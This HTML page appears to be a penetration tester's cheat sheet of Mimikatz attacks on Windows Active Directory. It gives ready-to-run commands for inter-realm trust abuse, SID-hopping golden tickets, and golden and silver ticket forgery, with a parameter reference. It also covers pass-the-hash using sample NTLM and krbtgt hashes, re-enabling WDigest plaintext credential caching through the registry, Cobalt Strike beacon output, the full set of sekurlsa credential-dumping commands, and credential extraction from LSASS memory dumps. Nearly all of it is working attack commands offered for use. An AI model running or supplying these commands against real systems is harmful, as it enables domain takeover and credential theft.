<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mimikatz</title>
</head><body><b><u>Inter-realm Trust Abuse</u></b><br/>
<br/>
mimikatz lsadump::trust /patch <br/>
<br/>
mimikatz kerberos::golden /user:Administrator /domain:&lt;child domain&gt; /sid:&lt;child domain sid&gt; /sids:&lt;parent domain Enterprise Admins SID&gt; /rc4:&lt;trust ticket RC4 hash&gt; /service:krbtgt /target:&lt;parent domain&gt; /ticket:&lt;ticket to save&gt;<br/>
<br/>
.\asktgs.exe C:\Users\Public\ticket.kirbi CIFS/server.domain.local<br/>
<br/>
.\kirbikator.exe lsa .\CIFS.domain.kirbi<br/>
<br/>
ls \\mcorp-dc.moneycorp.local\c$<b><u><br/>
</u></b><b><u><br/>
<br/>
<br/>
Sid Hopping Template<br/>
<br/>
<br/>
</u></b>target domain: admin.offshore.com<br/>
<br/>
current (child) domain: dev.admin.offshore.com<br/>
<br/>
child domain sid:<br/>
<br/>
Command for SID Hopping Golden Ticket:<br/>
<u><b><br/>
</b></u>mimikatz kerberos::golden /user:&lt;any user&gt; /domain:&lt;child domain&gt; /sid:&lt;child domain sid&gt; /sids:&lt;sids of enterprise domains in parent&gt; /krbtgt:&lt;krbtgt hash of child&gt; /ptt<br/>
<br/>
<br/>
<u><b><br/>
<br/>
<br/>
Mimikatz Golden Ticket<br/>
<br/>
</b></u>mimikatz kerberos::golden /user:&lt;username&gt; /domain:&lt;FQDN&gt; /sid:&lt;sid of parent or child domain&gt; /krbtgt:&lt;hash of krbtgt&gt; /ptt <br/>
<br/>
/user: This is the user you want to forge a ticket for<br/>
/domain: this is the domain you want to forge a ticket for<br/>
/sid: this is the domain's SID<br/>
/krbtgt: this is the KRBTGT Hash<br/>
<br/>
<u><b>Mimikatz Silver Ticket</b></u><br/>
<u><b><br/>
</b></u>mimikatz kerberos::golden /sid:&lt;sid of parent or child domain&gt; /domain:&lt;FQDN&gt; /ptt /target:DC01 /service:cifs /rc4:&lt;NTLM Hash&gt; /user:&lt;FakeUser&gt;<br/>
<br/>
<br/>
<u><span style="font-size: 11pt">Mimikatz Silver Ticket Command Reference</span><b><br/>
</b><b>&nbsp;<br/>
</b>The Mimikatz command to create a golden or silver ticket is “kerberos::golden”<br/>
&nbsp;<ul><li>&nbsp;/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.</li>
<li>/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.</li>
<li>/user – username to impersonate</li>
<li>/groups (optional) – group RIDs the user is a member of (the first is the primary group)</li>
<li>default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).</li>
<li>/ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.</li>
<li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li>
<li>/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).</li>
<li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li>
<li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li>
<li>/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li>
</ul>
<b><br/>
<br/>
</b></u><u><b>Disable mimikatz patch via registry</b></u><br/>
<br/>
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f<br/>
<br/>
<u><b>Pass The Hash</b></u><br/>
<br/>
sekurlsa::pth /user:SQLDEVADMIN /domain:US.FUNCORP.LOCAL /ntlm:ce03434e2f83b99704a631ae56e2146e<br/>
<br/>
All About SIDs<br/>
<br/>
<span style="font-size: 11pt">beacon&gt; <b>mimikatz sid::lookup /name:appsvc</b><br/>
[*] Tasked beacon to run mimikatz's sid::lookup /name:appsvc command<br/>
[+] host called home, sent: 961605 bytes<br/>
[+] received output:<br/>
Name &nbsp;: appsvc<br/>
Type &nbsp;: User<br/>
Domain: ELS-CHILD<br/>
SID &nbsp; : S-1-5-21-23589937-599888933-351157107-1109<br/>
</span><span style="font-size: 15pt"><br/>
</span><span style="font-size: 11pt">beacon&gt; <b>mimikatz sid::lookup /name:uatoperator</b><br/>
[*] Tasked beacon to run mimikatz's sid::lookup /name:uatoperator command<br/>
[+] host called home, sent: 961605 bytes<br/>
[+] received output:<br/>
Name &nbsp;: uatoperator<br/>
Type &nbsp;: User<br/>
Domain: ELS-CHILD<br/>
</span><span style="font-size: 11pt">SID &nbsp; : S-1-5-21-23589937-599888933-351157107-1110</span><span style="font-size: 15pt"><br/>
</span><span style="font-size: 15pt"><br/>
</span><span style="font-size: 11pt">beacon&gt; <b>mimikatz sid::lookup /sid:S-1-5-21-23589937-599888933-351157107-1118</b><br/>
[*] Tasked beacon to run mimikatz's sid::lookup /sid:S-1-5-21-23589937-599888933-351157107-1118 command<br/>
[+] host called home, sent: 961605 bytes<br/>
[+] received output:<br/>
SID &nbsp; : S-1-5-21-23589937-599888933-351157107-1118<br/>
Type &nbsp;: Group<br/>
Domain: ELS-CHILD<br/>
Name &nbsp;: PowerShell Remoting<br/>
<br/>
<b><u>Golden Ticket</u></b><br/>
<br/>
kerberos::golden /user:arobbins_da /domain:citadel.covertius.local /sid:S-1-5-21-592301725-3004806419-1885942225 /krbtgt:c1c540cb1f997657f5465e08468725f3 /endin:480 /renewmax:10080 /ptt<br/>
<br/>
arobbins_da is the user<br/>
sid is the domain sid of citadel.covertius.local<br/>
citadel.covertius.local is the domain<br/>
krbtgt is the ticket granting ticket found on the domain controller of through dcsync<br/>
<br/>
</span><span style="font-size: 15pt"><br/>
<br/>
</span><span style="color: #ff0000"><span style="font-size: 13pt"><u><b>In Cobalt Strike Beacon or Mimikatz Command Prompt</b></u></span></span><span style="font-size: 11pt"><br/>
</span><span style="font-size: 11pt"><br/>
</span><span style="font-size: 11pt">mimikatz sekurlsa::&lt;enter something from below, e.g. msv&gt;</span><span style="font-size: 15pt"><br/>
</span><span style="font-size: 15pt"><br/>
<br/>
</span><span style="font-size: 11pt"><br/>
mimikatz sekurlsa::msv<br/>
mimikatz sekurlsa::wdigest<br/>
mimikatz sekurlsa::kerberos &nbsp;&lt;I've seen this pull plain text passwords&gt;<br/>
mimikatz sekurlsa::tspkg<br/>
mimikatz sekurlsa::livessp<br/>
mimikatz sekurlsa::ssp<br/>
mimikatz sekurlsa::logonPasswords<br/>
mimikatz sekurlsa::minidump<br/>
mimikatz sekurlsa::trust<br/>
mimikatz sekurlsa::backupkeys<br/>
mimikatz sekurlsa::tickets<br/>
mimikatz sekurlsa::ekeys<br/>
mimikatz sekurlsa::dpapi<br/>
mimikatz sekurlsa::credman<br/>
mimikatz sekurlsa::<br/>
mimikatz sekurlsa::msv &nbsp;- &nbsp;Lists LM &amp; NTLM credentials<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wdigest &nbsp;- &nbsp;Lists WDigest credentials<br/>
&nbsp; &nbsp; &nbsp; &nbsp; kerberos &nbsp;- &nbsp;Lists Kerberos credentials<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tspkg &nbsp;- &nbsp;Lists TsPkg credentials<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;livessp &nbsp;- &nbsp;Lists LiveSSP credentials<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ssp &nbsp;- &nbsp;Lists SSP credentials<br/>
&nbsp; logonPasswords &nbsp;- &nbsp;Lists all available providers credentials<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;process &nbsp;- &nbsp;Switch (or reinit) to LSASS process &nbsp;context<br/>
&nbsp; &nbsp; &nbsp; &nbsp; minidump &nbsp;- &nbsp;Switch (or reinit) to LSASS minidump context<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pth &nbsp;- &nbsp;Pass-the-hash<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; krbtgt &nbsp;- &nbsp;krbtgt!<br/>
&nbsp; &nbsp; &nbsp;dpapisystem &nbsp;- &nbsp;DPAPI_SYSTEM secret<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;trust &nbsp;- &nbsp;Antisocial<br/>
&nbsp; &nbsp; &nbsp; backupkeys &nbsp;- &nbsp;Preferred Backup Master keys<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tickets &nbsp;- &nbsp;List Kerberos tickets<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ekeys &nbsp;- &nbsp;List Kerberos Encryption Keys<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dpapi &nbsp;- &nbsp;List Cached MasterKeys<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;credman &nbsp;- &nbsp;List Credentials Manager<br/>
<br/>
</span><span style="font-size: 15pt"><b><u>Dump Creds from .dmp file with mimikatz and volatility</u></b></span><span style="font-size: 11pt"><br/>
</span><span style="font-size: 11pt"><br/>
https://medium.com/@ali.bawazeeer/using-mimikatz-to-get-cleartext-password-from-offline-memory-dump-76ed09fd3330<br/>
<br/>
1. /usr/share/volatility<br/>
2. mkdir plugins<br/>
3. cd plugins<br/>
4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py<br/>
5. apt-get install python-crypto<br/>
6. volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz<br/>
<br/>
</span><span style="font-size: 15pt"><b><u>Or, alternatively</u></b></span><span style="font-size: 11pt"><br/>
</span><span style="font-size: 11pt"><br/>
</span><span style="font-size: 12pt">Run Mimikatz<br/>
Type, “sekurlsa::Minidump lsassdump.dmp“<br/>
</span><span style="font-size: 12pt">Lastly type, “sekurlsa::logonPasswords“</span><span style="font-size: 15pt"><br/>
</span><span style="font-size: 15pt"><br/>
<br/>
</span></body></html>